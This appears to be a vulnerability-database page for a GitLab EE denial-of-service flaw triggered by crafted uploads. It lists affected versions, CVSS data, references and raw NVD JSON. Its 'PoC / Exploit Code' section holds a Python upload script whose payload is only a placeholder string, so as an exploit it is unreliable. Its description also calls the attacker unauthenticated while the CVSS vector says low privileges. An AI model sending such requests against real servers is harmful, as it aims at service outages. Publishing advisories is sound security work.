CVE-2026-1184

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 11.9 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an unauthenticated user to cause denial of service by uploading a specially crafted file due to improper validation.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

GitLab EE >= 11.9, < 18.9.7

GitLab EE >= 18.10, < 18.10.6

GitLab EE >= 18.11, < 18.11.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
target_url = "https://gitlab.example.com/uploads"

# Malicious file content (Placeholder for the specific crafted payload)
payload = b"MALICIOUS_FILE_HEADER_CONTENT"

files = {'file': ('exploit.bin', payload, 'application/octet-stream')}

try:
    # Sending the request
    response = requests.post(target_url, files=files)
    if response.status_code == 200 or response.status_code == 429:
        print("Request sent, check server status for DoS condition.")
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1184
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1184
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1184/
[4] VulDB https://vuldb.com/cve/CVE-2026-1184
[5] https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/work_items/586634
[7] https://hackerone.com/reports/3515842

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1184", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:21.190", "lastModified": "2026-05-14T16:20:43.240", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 11.9 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an unauthenticated user to cause denial of service by uploading a specially crafted file due to improper validation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]"}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/586634", "source": "[email protected]"}, {"url": "https://hackerone.com/reports/3515842", "source": "[email protected]"}]}}